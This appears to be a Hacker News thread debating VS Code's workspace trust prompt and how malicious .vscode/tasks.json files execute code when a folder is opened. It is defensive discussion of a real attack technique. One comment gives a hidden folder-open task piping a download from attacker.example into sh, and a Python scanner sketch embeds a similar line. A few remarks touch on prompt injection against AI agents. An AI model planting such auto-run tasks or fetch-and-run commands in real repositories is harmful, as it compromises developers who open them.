
VS Code team member here :wave:

As called out elsewhere, workspace trust is literally the protection here that is being circumvented. When you open a folder, you're warned, with pretty strong wording, about whether you trust the origin/authors. Sure, you may find this annoying, but it's literally a security warning in a giant modal that forces you to choose.

Even if automatic tasks were disabled by default, you'd still be vulnerable if you trust the workspace. VS Code is an IDE, and the core and extensions can execute code based on files within the folder in order to provide rich features like autocomplete, compilation, running tests, agentic coding, etc.

Before workspace trust existed, we started noticing many extensions and core features shipping their own version of workspace trust warnings. Workspace trust unified these into a single, in-your-face experience. It's perfectly fine to not trust the folder; you'll just enter restricted mode, which will protect you, and certain things will be degraded: language servers may not run, you won't be able to debug (debugging executes code via .vscode/launch.json), etc.

Ultimately we're shipping a developer tool that can do powerful things, like automating project compilation or dependency installs when you open a folder. This attack vector capitalizes on neglectful developers who ignore a scary-looking security warning. It certainly happens in practice, but workspace trust is pretty critical to the trust model of VS Code, and an important part of it is improving the UX: we annoy you a _single_ time when you open the folder, not several times from various components using a JIT notification approach. I recall many discussions about the exact wording of the warning; it's a difficult concept to communicate in the small number of words it has to use.

My recommendation is to use the checkbox to trust the parent folder, or to configure trusted folders. I personally keep all my safe git clones in a dev/ folder which I've configured as trusted, and a playground/ folder where I put random projects I don't know much about, deciding at the time I open something.
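For reference, a minimal settings.json sketch of the related knobs (setting names are from the workspace trust docs; the values here are just an illustration):

```json
{
  // Master switch for workspace trust and when the prompt appears
  "security.workspace.trust.enabled": true,
  "security.workspace.trust.startupPrompt": "once",
  // What to do with individual files opened from untrusted locations
  "security.workspace.trust.untrustedFiles": "prompt"
}
```

As far as I can tell, the trusted-folder list itself (e.g. a dev/ parent) is managed through the "Manage Workspace Trust" editor rather than a plain settings entry.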



I suspect that you're relying too heavily on the user here. Even for myself, a very experienced developer, I don't have a flash of insight over what my risk exposure might be for what I'm opening at this moment. I don't have a comprehensive picture of all the implications, all I'm thinking is "I need to open this file and twiddle some text in it". Expecting us to surface from our flow, think about the risks and make an informed decision might on the surface seem like a fair expectation, but in the real world, I don't think it's going to happen.

Your recommendation makes sense as a strategy to follow ahead of time, before you're in that flow state. But now you're relying on people to have known about the question beforehand, and have this strategy worked out ahead of time.

If you're going to rely on this so heavily, maybe you should make that strategy more official, and surface it to users ahead of time - maybe in some kind of security configuration wizard or something. Relying on them to interrupt flow and work it out is asking too much when it's a security question that doesn't have obvious implications.


> I don't have a flash of insight over what my risk exposure might be for what I'm opening at this moment

Maybe I'm too close to it, but the first sentence gives a very clear outline of the risk to me: trusting this folder means code within it may be executed automatically.

> I don't have a comprehensive picture of all the implications, all I'm thinking is "I need to open this file and twiddle some text in it".

I'm curious what would stop you from opening it in restricted mode? Is it because it says browse and not edit under the button?

> Your recommendation makes sense as a strategy to follow ahead of time, before you're in that flow state.

You get the warning up front when you open a folder though, isn't this before you're in a flow state hacking away on the code?


> Trusting this folder means code within it may be executed automatically.

But as you point out elsewhere, what constitutes code is very context dependent. And the user isn't necessarily going to be sufficiently expert on how Code interacts with the environment to evaluate that context.

> I'm curious what would stop you from opening it in restricted mode?

Even after years of using Code, I don't know the precise definition of "restricted mode". Maybe I ought to, but learning that isn't at the top of my list of priorities.

> You get the warning up front when you open a folder though, isn't this before you're in a flow state hacking away on the code?

NO! Not even close! And maybe this is at the heart of why we're not understanding each other.

My goal is not to run an editor and change some characters, not at all. It's so far down the stack that I'm scarcely aware of it at all, consciously. My goal is to, e.g., find and fix the bug that the Product Manager is threatening to kill me over. In order to do that I'm opening log files in weird locations (because they were set up by some junior teammate or something), and then opening some code I've never seen before because it's legacy stuff 5 years old that nobody has looked at since; I don't even have a full picture of all languages and technologies that might be in use in this folder. But I do know for sure that I need to be able to make what edits may turn out to be necessary half an hour from now once I've skimmed over the contents of this file and its siblings, so I can't predict for sure whether whatever the heck "restricted mode" will do to me will interfere with those edits.

I'm pretty sure that the above paragraph represents exactly what's going on in the user's mind for a typical usage of Code.


Good point about one off edits and logs, thanks for all the insights. I'll pass these discussions on to the feature owner!


Thanks for being part of the discussion. Almost every response from you in this thread, however, comes off as an unyielding "we decided this and it's 100% right".

In light of this vulnerability, the team may want to revisit some of the assumptions that were made.

I guarantee the majority of people see a giant modal covering what they're trying to do and just do whatever gets rid of it: they see the title bar that says 'Trust this workspace?' and hit the big blue "Yes" button just to get to work quickly.

With AI and agents, there are now a lot of non-dev "casual" users of VS Code who saw something in a YouTube video and have no clue what dangers they could face just by opening a new project.

Almost no one is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).
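That kind of scan is cheap to sketch. A hedged example (this is not how VS Code works internally, and real tasks.json files may contain comments that strict JSON parsing rejects): flag any task configured to run on folder open and surface its command.

```python
import json
import pathlib
import tempfile

def auto_run_commands(folder):
    """Return commands of tasks that would run automatically on folder open."""
    tasks_file = pathlib.Path(folder) / ".vscode" / "tasks.json"
    if not tasks_file.exists():
        return []
    data = json.loads(tasks_file.read_text())
    return [
        task.get("command", "<no command>")
        for task in data.get("tasks", [])
        if task.get("runOptions", {}).get("runOn") == "folderOpen"
    ]

# Demo against a throwaway folder mimicking a malicious repo
# (the URL is a placeholder, not a real payload host).
with tempfile.TemporaryDirectory() as repo:
    vscode_dir = pathlib.Path(repo) / ".vscode"
    vscode_dir.mkdir()
    (vscode_dir / "tasks.json").write_text(json.dumps({
        "version": "2.0.0",
        "tasks": [{
            "label": "build",
            "type": "shell",
            "command": "curl -s https://attacker.example/x | sh",
            "runOptions": {"runOn": "folderOpen"},
        }],
    }))
    found = auto_run_commands(repo)

print(found)  # → ['curl -s https://attacker.example/x | sh']
```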


Didn't mean to come off that way; I'm familiar with a lot of the decisions that were made. One thing I've taken from this is that we should probably open `/tmp/`, `C:\`, `~/`, etc. in restricted mode without asking the user. But a lot of the proposed solutions, like opening everything in restricted mode, I highly doubt will ever happen, as they would add confusion, be a big change to the UX, and so on.

With AI, the warning needs to appear somewhere; either the user ignores it when opening the folder, or they ignore it when engaging with agent mode.


> Almost no one is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).

I’m not sure this is possible, or that it wouldn't be misleading at the time trust is granted, because adding or updating extensions, or changing any content in the folder after trust is granted, can change what will be executed.


For what it's worth, I absolutely agree with the comments saying the warning doesn't clearly communicate the risks. I too had no idea that opening a directory in VS Code (one that contains a tasks.json file) could cause code to execute. I understood the risk of extensions, but I think that's different, right? i.e., opening a trusted project doesn't automatically install extensions when there's an extensions.json (don't quote me on that, unless it's correct)

To give some perspective: VS Code isn't my primary IDE, it's more like my browsing IDE. I use it to skim a repo or make minor edits without waiting for IntelliJ to index the world and initialize the obscene number of plugins I apparently have installed by default. Think: fixing a broken build. If I'm only tweaking, or reinstalling dependencies because the package-lock file got corrupted (and that's totally not something that happened this week), I don't need all the bells and whistles. Actually, I want less, because restarting the TypeScript service multiple times is painful, even on a high-end Mac.

Anyway, enough about IntelliJ. This post has some good discussions and I sincerely hope that you (well, and Microsoft) take this feedback seriously and do something about it. I imagine that's hard, as opposed to, say, <improving some metric collected by telemetry and fed into a dashboard somewhere>, but this is what matters. Remember what Steve Ballmer said about UAC? I don't know if he said anything, but if it didn't work then, it's not going to work now.


> I'm curious what would stop you from opening it in restricted mode? Is it because it says browse and not edit under the button?

Have you tried it? It breaks a lot of things that I would not have expected from the dialog. It’s basically regressing to a slightly more advanced notepad.exe with better grepping facilities in some combinations of syntax and plugins.


Isn't that what you would want if you're opening an untrusted codebase?


No, I want syntax highlighting.

In the past, editors could give me syntax highlighting without opening me to vulnerabilities.


Syntax highlighting works perfectly fine in Restricted mode, at least for me.

Perhaps you have some settings you can adjust in your install to get that working?

Check the docs on this page: https://code.visualstudio.com/docs/editing/workspaces/worksp...


> I'm curious what would stop you from opening it in restricted mode? Is it because it says browse and not edit under the button?

loss of syntax highlighting and to a lesser extent the neovim plugin. maybe having some kind of more granular permission system or a whitelist is the answer here.

opening a folder in vscode shouldn't be dangerous.


> opening a folder in vscode shouldn't be dangerous.

You're not "opening a folder" though, you're opening a codebase in an IDE, with all the integrations and automations that implies, including running code.

As a developer it's important to understand the context in which you're operating.

If you just want to "open a folder" and browse the contents, that's literally what Restricted mode is for. What you're asking to do is already there.


I've been using VS Code for many years and I try pretty hard to be a security aware dev.

I check out all code projects into ~/projects. I don't recall ever seeing a trust/restricted dialog box. But, I'm guessing, at some point in the distant past, I whitelisted that folder and everything under it.

I've only just now, reading through this thread, realized how problematic that is. :o/


Syntax highlighting should work if the highlighting is provided by a TextMate grammar; it will not work if it's semantic highlighting provided by an extension and that extension requires workspace trust. If it's possible to highlight without executing code, that sounds like an extension issue for whatever language it is. I believe extensions are able to declare whether they should activate without workspace trust, and also to query the workspace trust state at runtime.
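For extension authors, that declaration lives in the extension's package.json; a minimal sketch (the `untrustedWorkspaces` field is from the VS Code workspace trust extension API; the restricted setting name is just an example):

```json
{
  "capabilities": {
    "untrustedWorkspaces": {
      "supported": "limited",
      "restrictedConfigurations": ["python.defaultInterpreterPath"]
    }
  }
}
```

With `"supported": "limited"`, the extension activates in restricted mode but the listed workspace-level settings are ignored until trust is granted.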


The funny part is that everyone expects you to make an informed decision about your security, without even providing any data to make that decision.

A better strategy would be:

- (seccomp) sandbox by default

- dry run, observe accessed files and remember them

- display a dialog saying: hey, this plugin accesses your profile folder with passwords.kdbx in it. You wanna allow it?

In an optimal world this would be provided by the operating system, which should have a better trust model for executing programs that are essentially from untrusted sources. The days when you knew exactly what kind of programs were stored in your folders are long gone, but for whatever reason no operating system has adapted to that.

And before anyone says the tech isn't there yet: It is, actually, it's called eBPF and XDP.
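The "dry run, observe accessed files" step can at least be sketched in-process with Python's audit hooks (a toy stand-in for the kernel-level seccomp/eBPF enforcement proposed above):

```python
import os
import sys
import tempfile

# Record every file the program tries to open; a trust dialog could
# then show this list instead of a vague "may execute code" warning.
accessed = []

def recorder(event, args):
    if event == "open":  # raised by open()/os.open() and friends
        accessed.append(str(args[0]))

sys.addaudithook(recorder)  # note: audit hooks cannot be removed later

# Simulate untrusted code touching a sensitive-looking file.
fd, secret = tempfile.mkstemp(suffix=".kdbx")
os.close(fd)
with open(secret, "rb"):
    pass
os.unlink(secret)

print(secret in accessed)  # → True
```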


You also get problems with overwarning causing warning fatigue. Home Assistant uses VS Code as its editor (or at least the thing you use to replace the built-in equivalent of Windows Notepad) and every single time I want to edit a YAML config file I first have to swat away two or three warnings about how dangerous it is to edit the file that I created that's stored on the local filesystem. So my automatic reaction to the warnings is "Go away [click] Go away [click] Go away [click], fecking Microsoft".


I’d like more granular controls - sometimes I don't want to trust the entire project, but I do want to trust some elements of it


How is this any different than anything else devs do? Devs use `curl some-url | sh`. Devs download python packages, rust crates, ruby gems, npm packages, all of them run code.

At some point the dev has to take responsibility.


> Devs download python packages, rust crates, ruby gems, npm packages, all of them run code.

You allow developers to download and run arbitrary packages? Where I came from, that went out years ago. We keep "shrinkwrap" servers providing blessed versions of libraries. To test new versions, and to evaluate new packages, there's a highly-locked-down lab environment.


Sorry, but this reply is just ridiculous. There's more to being a developer than just writing a bunch of code in a flow state. And it's silly to claim you're so deep in "flow" that you can't be bothered to read and understand a security popup.

If that's how you work, then you're part of the problem.


Please don't cross into personal attack, regardless of how wrong someone is or you feel they are.

https://hackernews.hn/newsguidelines.html


Yes. If you "can't" read the security popup that very clearly tells you that this is a risky action and you should only do it if you trust the repo, then it's either a reading comprehension issue, and you should take remedial classes, or you're intentionally ignoring it, and thus deeply antisocial and averse to working with other people.

Both of those things are extremely bad in any work environment and I would never hire someone displaying either of those traits.


I think it would be better to defer the Workspace trust popup and immediately open in restricted mode; maybe add an icon for it in the bottom info bar & have certain actions notify the user that they'd have to opt in before they'd work.

Because right now you are triggering the cookie banner reflex where a user just instinctively dismisses any warnings, because they want to get on with their work / prevent having their flow state broken.

There should also probably be some more context in the warning text on what a malicious repo could do, because clearly people don't understand why you are asking whether they trust the authors.

And while you're at it, maybe add some "virus scanner" that can read through the repo and flag malicious looking tasks & scripts to warn the user. This would be "AI" based so surely someone could even get a job promotion out of this for leading the initiative :)


Some JIT notification to enable it and/or a status bar banner was considered, but ultimately this design was chosen to improve the user experience. Instead of opening a folder, having it restricted, and code editing being broken until you click some item in the status bar, you're asked up front.

It was a long time ago that this was added (maybe 5 years?), but I think the reasoning was that since our core competency is editing code, opening a folder should make that work well. The expectation is that most users will trust almost all their windows; it's an edge case for most developers to open and browse unfamiliar codebases that could contain such attacks. Trust also affects not just code editing but things like workspace settings, so the editor could work radically differently when you trust it.

You make a good point about the cookie banner reflex, but you don't have to hit "accept all" on those either.


IMO this is a mistake, for basically the same reason you justify it with. Since most people just want the code to work, and the chances of any specific repo being malicious is low, especially when a lot of the repos you work with are trusted or semi-trusted, it easily becomes a learned behavior to just auto accept this.

Trust in code operates on a spectrum, not a binary. Different code bases have vastly different threat profiles, and this approach does close to nothing to accommodate that.

In addition, code bases change over time, and full auditing is near impossible. Even if you manually audit the code, most code is constantly changing. You can pull an update from git, and the audited repo you trusted can no longer be trustworthy.

An up-front, binary, persistent trust-or-don't-trust model isn't a particularly good match for either user behavior or the potential threats most users will face.


So why not allow for enabling this behavior as a configuration option? A big fat banner for most users (i.e. by default) and the few edge cases get the status bar entry after they asked for it.


I find this reply concerning. If it's THE security feature, then why is "Trust" a glowing bright blue button in a popup that appears at startup, forcing a decision? That makes no sense at all. Why not a banner with the option to enable those features when needed, like Office tools have?

Also, the two buttons have the subtexts "Browse folder in restricted mode" and "Trust folder and enable all features", which is quite steering and sounds almost like you cannot even edit code in restricted mode.

"If you don't trust the authors of these files, we recommend to continue in restricted mode" also doesn't sound that critical, does it?


I dunno how to break it to you, but most of the people using AI the most are not very good with computers.

I think with AI we'll quickly get to the point where it needs to run in a nice little isolated sandbox, with the underlying project (and definitely everything else around it) entirely read-only (via an overlay FS or some similar solution). Let it work in the sandbox, and then have the user accept the result only at the end of the session, via a separate process that applies the AI's changes as a set of commits (NOT committing direct file changes back, as malicious code could then mess stuff up in the .git dir, like adding hooks). That way, at very worst, you're some commit reverts away from a clean main repo.


AI has certainly made everything in this area more complicated. I 100% agree about sandboxing, and we have people investing in this right now; there's an early opt-in version we just landed in Insiders.


Interesting! Is there a pointer to an issue where this feature is described by chance?


>You're warned when you open a folder whether you trust the origin/authors with pretty strong wording.

I can see the exact message you're referring to in the linked article. It says "Code provides features that *may* automatically execute files in this folder." It keeps things ambiguous and comes off as one of the hundreds of legal CYA pop-ups that you see throughout your day. It's not clear that "Yes, I trust the authors" means "Go ahead and start executing shell scripts". It's also not clear what exactly the difference between the two choices is regarding how usable the IDE is if you say no.


"May" is the most correct word though; it's not guaranteed, and VS Code (core) doesn't actually know whether things will execute as a result, because extensions also depend on the feature. Running the "Manage Workspace Trust" command, which is mentioned in the [linked docs][0], goes into more detail about what exactly is blocked, but we determined this is probably too much information and instead tried to distill it into a simple decision. That single short sentence is essentially what workspace trust protects you from.

My hope has always been (though I know there are plenty of people who don't do this) that users think "huh, that sounds scary, maybe I should not trust it, or understand more", not blindly say they trust.

[0]: https://code.visualstudio.com/docs/editing/workspaces/worksp...


The grey bar at the top that says "this is an untrusted workspace" is really annoying & encourages users to trust all workspaces.


It's intentionally prominent because you're in a potentially very degraded experience. You can just click the x to hide it, which is remembered the next time you open the folder. If this banner weren't really obvious, we'd have frustrated users who accidentally/unknowingly ended up in this state, and silly bug reports wasting everyone's time about language services and the like not working.


imo there's nothing "degraded" about editing text without arbitrary code execution. that's what text editors are supposed to do.


Visual Studio Code was announced from day one as a lightweight development environment, not as a "text editor".


Meet the new Microsoft - same as the old one. This is the same reasoning that led to a decade of mind-numbingly obvious exploits against Internet Explorer. You've got to create secure defaults. You have to ask whether your users really want or need some convenience that comes at the expense of an increased attack surface.


Hi, I'm one of the researchers that identified this threat and I blogged about it back in November (https://opensourcemalware.com/blog/contagious-interview-vsco...)

First, @Tyriar thanks for being a part of this conversation. I know you don't have to, and I want to let you know I get that you are choosing to contribute, and I personally appreciate it.

The reality is that VS Code ships in a way that is perfect for attackers to use tasks files to compromise developers:

1. You have to click "trust this code" on every repo you open, which is just noise and desensitizes the user to the real underlying security threat. What VS Code should do is warn you when there is a tasks file, especially if there is a "command" parameter in that tasks file.

2. You can add parameters like these to tasks files to disable some of the notification features so devs never see the notifications you are talking about: "presentation": { "reveal": "never", "echo": false, "focus": false, "close": true, "panel": "dedicated", "showReuseMessage": false}

3. Regardless of Microsoft's observation that opening other people's code is risky, I want to remind you that all of us open other people's code all day long, so it seems a little duplicitous to say "you'd still be vulnerable if you trust the workspace". I mean, that's kind of our job. Your "Workspaces" abstraction is great on paper, especially for project-based workflows, but that's not the only way most of us use VS Code. The issue here is that Microsoft created a new feature (tasks files) that executes things when I open code in VS Code. This is new, and separate from the intrinsic risk of opening other people's code. Ignoring that fact seems to me like running away from the responsibility to address what you've created.
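Putting points 1 and 2 together, the attack shape is a checked-in .vscode/tasks.json along these lines (the URL is a placeholder; this assumes the folder is trusted and automatic tasks are allowed):

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "curl -s https://attacker.example/payload | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": {
        "reveal": "never",
        "echo": false,
        "focus": false,
        "close": true,
        "panel": "dedicated",
        "showReuseMessage": false
      }
    }
  ]
}
```

The innocuous label and suppressed terminal output mean the only sign anything ran is whatever the command itself does.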

Because of the above points, we are quickly seeing VS Code tasks files become the number one way that developers are compromised by nation-state actors (typically North Korea/Lazarus).

Just search github and you'll see what I mean: https://github.com/search?q=path%3Atasks.json+vercel.app&ref...

There are dozens and dozens of bad guys using this technique right now. Microsoft needs to step up. End of story.


We're planning on switching the default in 1.109 with https://github.com/microsoft/vscode/issues/287073

My main hesitation here was that it's really just a false sense of security. Tasks are just one of the things trust enables, and in the core codebase we are unable to determine exactly what it enables, as extensions could do all sorts of things. At a certain point, it's really on the user not to dismiss the giant modal security warning that describes the core risk in its first sentence, and not to say they trust things they don't actually trust.

I've also created these follow ups based on this thread:

- Revise workspace trust wording "Browse": https://github.com/microsoft/vscode/issues/289898

- Don't ask to enable workspace trust in system folders and temp directories: https://github.com/microsoft/vscode/issues/289899


Oh wow, that's the first time I've heard about those tasks. I would never consent to that. That they are enabled by default and shipped in the .vscode folder, where most people probably never even would have thought to look for malicious things, is kind of insane.


Would it be possible to show the alert only when there are potential threats, instead of every time a folder is opened? Like showing a big red alert when opening a folder with a ".vscode" directory in it for the first time?


It's not just the .vscode folder, though; the Python extension, for example, executes code in order to provide language services. How could this threat detection possibly be complete? In this new LLM-assisted world, a malicious repository could be as innocuous as a plain-text prompt injection attack hidden in a markdown file, or some random command/script that seems like it could be legitimate. There are other mitigations in place and in progress to help with the LLM issue, but it's a hard problem.


This demonstrates the actual real-world problem, though. You're saying "this is a complex problem so I'm going to punt and depend on the user to resolve it". But in real life, the user doesn't even know as much as you do about how Code and its plugins interact with their environment. Knowledgewise, most users are not in a good position to evaluate the dangers. And even those who could understand the implications are concentrating on their goal of the moment and won't be thinking deeply about it.

You're relying on the wrong people, and at the wrong time, for this to be very effective.


> It's not just the .vscode folder though, the Python extension for example executes code in order to provide language services.

Which code? Its own code (which the user already trusts anyway), or code from the workspace (automatically)? My expectation with a language server is that it never runs code from the workspace in a way that could have side effects beyond the server gaining an understanding of the code. So this makes little sense?


Your expectation is wrong in this case for almost all languages. The design of Pylance (as is sort of forced by Python itself) chooses to execute Python to discover things like the Python version, and the Python startup process can run arbitrary code through mechanisms like sitecustomize.py, or via a Python interpreter checked into the repo itself. To my knowledge, Go is one of the few ecosystems that treats executing user-supplied code during analysis as a security failure; many languages have macros or dynamic features that basically require executing some amount of the code being analyzed.
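A small demo of the sitecustomize.py mechanism mentioned above (pure stdlib; this one only prints, but an attacker-controlled file in the same position could do anything):

```python
import os
import subprocess
import sys
import tempfile

# Any sitecustomize.py the interpreter can import runs automatically at
# startup, before the "real" program executes a single line.
with tempfile.TemporaryDirectory() as d:
    with open(os.path.join(d, "sitecustomize.py"), "w") as f:
        f.write('print("sitecustomize ran first")\n')
    env = dict(os.environ, PYTHONPATH=d)
    result = subprocess.run(
        [sys.executable, "-c", 'print("analysis code")'],
        env=env, capture_output=True, text=True,
    )

print(result.stdout)
```

So merely asking the checked-in interpreter "what version are you?" is enough to hand over execution.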


Installing dependencies on folder open is a massive misfeature. I understand that you can't do anything about extensions that also do it but I really hope that you guys see how bad an idea that is for the core editor. "Do I trust the authors of this workspace" is a fundamentally different question than "can I run this code just by looking at it"


> It's perfectly fine to not trust the folder, you'll just enter restricted mode that will protect you and certain things will be degraded like language servers may not run, you won't be able to debug (executes code in .vscode/launch.json), etc.

This is the main problem with that dialog: It’s completely unclear to me, as a user, what will and will not happen if I trust a workspace.

I treat the selection as meaning that I’m going to have nothing more than a basic text editor if I don’t trust the workspace. That’s fine for some situations, but eventually I want to do something with the code. Then my only options are to trust everything and open the possibility of something (?) bad happening, or not do any work at all. There’s no visibility into what’s happening, no indication of what might happen, just a vague warning that I’m now on my own with no guardrails or visibility. Good luck.


How about showing the user what the IDE will automatically execute upon opening?



